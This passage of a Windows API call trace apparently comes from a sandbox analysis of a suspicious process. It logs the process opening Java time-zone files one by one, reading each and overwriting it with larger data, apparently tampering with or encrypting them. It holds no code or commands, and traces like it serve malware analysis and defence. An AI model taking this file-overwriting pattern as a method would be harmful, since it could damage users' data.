cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+1", lpUsedDefaultChar=0x0) returned 5 [0141.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x2d5f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.032] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.032] WriteFile (in: hFile=0x1f0, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.032] CloseHandle (hObject=0x1f0) returned 1 [0141.032] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1b [0141.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.033] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.037] ReleaseMutex (hMutex=0x168) returned 1 [0141.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+6", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+6", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+6", lpUsedDefaultChar=0x0) returned 5 [0141.037] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.038] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.038] WriteFile (in: hFile=0x1f0, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.038] CloseHandle (hObject=0x1f0) returned 1 [0141.039] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1b [0141.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.040] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.050] ReleaseMutex (hMutex=0x168) returned 1 [0141.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-13", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-13", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-13", lpUsedDefaultChar=0x0) returned 6 [0141.050] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2d5f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.051] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.051] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.051] CloseHandle (hObject=0x1f0) returned 1 [0141.051] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.052] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.052] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1b [0141.052] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.052] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.066] ReleaseMutex (hMutex=0x168) returned 1 [0141.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-8", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-8", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-8", lpUsedDefaultChar=0x0) returned 5 [0141.066] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2d5f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.067] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.067] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.068] CloseHandle (hObject=0x1f0) returned 1 [0141.068] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.068] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.069] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4d4 [0141.069] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.069] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.081] ReleaseMutex (hMutex=0x168) returned 1 [0141.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Berlin", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Berlin", cchWideChar=6, lpMultiByteStr=0x1f7ad44, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Berlin", lpUsedDefaultChar=0x0) returned 6 [0141.081] ReadFile (in: hFile=0x1f0, lpBuffer=0x286d468, nNumberOfBytesToRead=0x4d4, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286d468*, lpNumberOfBytesRead=0x2d5f2bc*=0x4d4, lpOverlapped=0x0) returned 1 [0141.092] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.092] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa5c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa5c, lpOverlapped=0x0) returned 1 [0141.092] CloseHandle (hObject=0x1f0) returned 1 [0141.092] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.097] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.097] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x40c [0141.097] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.097] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.108] ReleaseMutex (hMutex=0x168) returned 1 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Helsinki", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Helsinki", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Helsinki", lpUsedDefaultChar=0x0) returned 8 [0141.108] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x40c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2d5f2bc*=0x40c, lpOverlapped=0x0) returned 1 [0141.125] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.125] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x994, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x994, lpOverlapped=0x0) returned 1 [0141.125] CloseHandle (hObject=0x1f0) returned 1 [0141.125] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.126] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.127] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5a0 [0141.127] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.127] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.127] ReleaseMutex (hMutex=0x168) returned 1 [0141.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Malta", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Malta", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Malta", lpUsedDefaultChar=0x0) returned 5 [0141.127] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x5a0, lpOverlapped=0x0) returned 1 [0141.862] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.862] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xb28, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xb28, lpOverlapped=0x0) returned 1 [0141.863] CloseHandle (hObject=0x1f0) returned 1 [0141.863] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.865] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.865] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5a0 [0141.865] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.865] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.865] ReleaseMutex (hMutex=0x168) returned 1 [0141.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rome", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0141.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rome", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rome", lpUsedDefaultChar=0x0) returned 4 [0141.865] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x5a0, lpOverlapped=0x0) returned 1 [0141.875] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.875] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xb28, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xb28, lpOverlapped=0x0) returned 1 [0141.875] CloseHandle (hObject=0x1f0) returned 1 [0141.875] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vaduz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.876] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.876] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3f0 [0141.876] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.877] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.877] ReleaseMutex (hMutex=0x168) returned 1 [0141.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vaduz", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vaduz", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vaduz", lpUsedDefaultChar=0x0) returned 5 [0141.877] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x3f0, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2d5f2bc*=0x3f0, lpOverlapped=0x0) returned 1 [0141.886] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.886] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x978, lpOverlapped=0x0) returned 1 [0141.886] CloseHandle (hObject=0x1f0) returned 1 [0141.886] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.887] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.887] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1b [0141.887] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.887] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.887] ReleaseMutex (hMutex=0x168) returned 1 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HST", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HST", cchWideChar=3, lpMultiByteStr=0x1f7ad44, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HST", lpUsedDefaultChar=0x0) returned 3 [0141.888] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x2d5f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.889] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.889] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.889] CloseHandle (hObject=0x1f0) returned 1 [0141.889] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.890] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.890] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0141.890] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.891] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.891] ReleaseMutex (hMutex=0x168) returned 1 [0141.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maldives", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maldives", cchWideChar=8, lpMultiByteStr=0x1f7342c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Maldives", lpUsedDefaultChar=0x0) returned 8 [0141.891] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.892] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.892] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.892] CloseHandle (hObject=0x1f0) returned 1 [0141.892] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.893] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.893] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x544 [0141.893] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.893] 